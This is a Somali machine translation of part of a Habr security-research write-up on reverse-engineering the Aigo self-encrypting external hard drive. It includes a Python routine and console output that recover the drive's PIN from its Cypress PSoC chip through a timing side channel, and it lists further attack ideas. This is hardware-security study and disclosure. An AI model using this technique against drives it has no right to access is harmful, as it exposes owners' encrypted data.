Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC

Kadibna waxaan ka bedelay lambarka sirta ah ee "123456" una beddelay "1234567" oo aan helay:

Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC

Haddaba, furaha sirta ah iyo miiska isku-dayga khaldan waxay u muuqdaan inay ku kaydsan yihiin qaybta lambarka 126.

7.5. Qaadashada qashinka baloogga No. 126

Block #126 waa inuu ku yaal meel ku dhow 125x64x18 = 144000ΞΌs, laga bilaabo bilawga xisaabinta jeegga, qashinkayga buuxa, waxayna u egtahay mid macquul ah. Kadib, ka dib markii aan gacanta ku shaandheeyay qashin qubyo badan oo aan ansax ahayn (sababtoo ah isu-ururinta "waqtiga yar-dhaafka ah"), waxaan ku dhammeeyey helitaanka baytyadan (xilliga 145527 ΞΌs):

Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC

Way iska caddahay in lambarka sirta ah uu ku kaydsan yahay qaab aan qarsoodi ahayn! Qiimayaashan, dabcan, kuma qorna koodka ASCII, laakiin sida ay soo baxday, waxay ka tarjumaysaa akhrinta laga soo qaatay kiiboodhka awoodda leh.

Ugu dambayntii, waxa aan sameeyay baadhitaano kale si aan u ogaado halka lagu kaydiyay miiska isku dayga xun. Waa kan natiijada:

Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC

0xFF - macneheedu waa "15 isku day" waxayna hoos u dhigtaa isku day kasta oo fashilmay.

7.6. Soo kabashada koodhka PIN

Waa kan koodkaygii foosha xumaa ee kor ku xusan:

def dump_pin():
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):
    csum = csum_at(delay, 1)
    byte = (csum-last_csum)&0xFF
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:
      print pin_map[pin_bytes[i]],
  print

Waa kan natiijada dilkeeda:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Hooray! shaqeeya

Fadlan ogow in qiimayaasha daahitaanka ee aan isticmaalay ay u badan tahay inay khuseeyaan hal PSoC gaar ah - kii aan isticmaalay.

8. Maxaa xiga?

Haddaba, aan ku soo koobno ​​dhinaca PSoC, macnaha guud ee wadista Aigo:

  • SRAM waan akhrin karnaa xitaa haddii la akhriyo iyadoo la ilaalinayo;
  • Waxaan ka gudbi karnaa ilaalinta ka-hortagga dhaq-dhaqaaqa anagoo adeegsanayna weerarka raadraaca bootka qabow oo si toos ah u akhrinaya lambarka sirta ah.

Si kastaba ha ahaatee, weerarkayagu waxa uu leeyahay cillado ay ugu wacan tahay dhibaatooyinka wada shaqaynta. Waxaa lagu hagaajin karaa sida soo socota:

  • qor utility si aad si sax ah u qeexdo xogta wax soo saarka ee la helay iyada oo ay sabab u tahay weerarka "raafka kabaha qabow";
  • adeegso aaladda FPGA si aad u abuurto dib-u-dhac sax ah oo dheeri ah (ama isticmaal saacadaha qalabka Arduino);
  • isku day weerar kale: Geli koodhka sirta ah ee khaldan si ula kac ah, reboot oo tuur RAM, adoo rajaynaya in lambarka sirta ah ee saxda ah lagu kaydin doono RAM marka la barbardhigo. Si kastaba ha ahaatee, tani ma fududa in lagu sameeyo Arduino, maadaama heerka calaamada Arduino uu yahay 5 volts, halka guddiga aan baaraynaa ay ku shaqeeyaan calaamadaha 3,3 volt.

Hal shay oo xiiso leh oo la isku dayi karo ayaa ah in lagu ciyaaro heerka korantada si looga gudbo ilaalinta akhrinta. Haddii habkani shaqeynayo, waxaan awood u yeelan karnaa inaan ka helno xogta saxda ah ee flash-ka - halkii aan ku tiirsanaan lahayn akhrinta jeegagga ee leh dib-u-dhac aan sax ahayn.

Maadaama SROM-ku ay u badan tahay inuu akhriyo qaniinyada waardiyaha isagoo adeegsanaya nidaamka ReadBlock, waxaan samayn karnaa wax la mid ah sida lagu tilmaamay on blog Dmitry Nedospasov - dib u dhaqangelinta weerarkii Chris Gerlinski, oo lagu dhawaaqay shirka "REcon Brussels 2017".

Waxyaabo kale oo xiiso leh oo la samayn karo waa in kiiska laga gooyo chip: in la qaado qashinka SRAM, la ogaado wicitaanada nidaamka aan sharciyeysneyn iyo dayacanka.

9. Gunaanad

Marka, ilaalinta darawalkan ayaa wax badan ka tagaya in la rabo, sababtoo ah waxay isticmaashaa microcontroller joogto ah (ma aha "adag") si ay u kaydiso koodhka PIN-ka ... Plus, ma aan eegin (wali) sida ay wax u socdaan xogta sirta qalabkan!

Maxaad ku talin kartaa Aigo? Ka dib markii aan falanqeeyay dhowr nooc oo ah darawallada HDD sir ah, 2015 ayaan sameeyay bandhigid on SyScan, kaas oo uu ku baadhay dhibaatooyinka amniga ee dhowr drives HDD dibadda ah, oo uu ku taliyay waxa lagu hagaajin karo iyaga. πŸ™‚

Waxaan ku qaatay laba toddobaad oo axad ah iyo dhawr habeenimo oo aan cilmi-baadhistan sameeyay. Wadar ahaan ilaa 40 saacadood. Tirinta bilawgii hore (marka aan furay saxanka) ilaa dhamaadka (qashin koodka PIN). Isla 40-ka saacadood waxa ku jira wakhtiga aan ku qaatay qorista maqaalkan. Wuxuu ahaa safar aad u xiiso badan.

Source: www.habr.com

Add a comment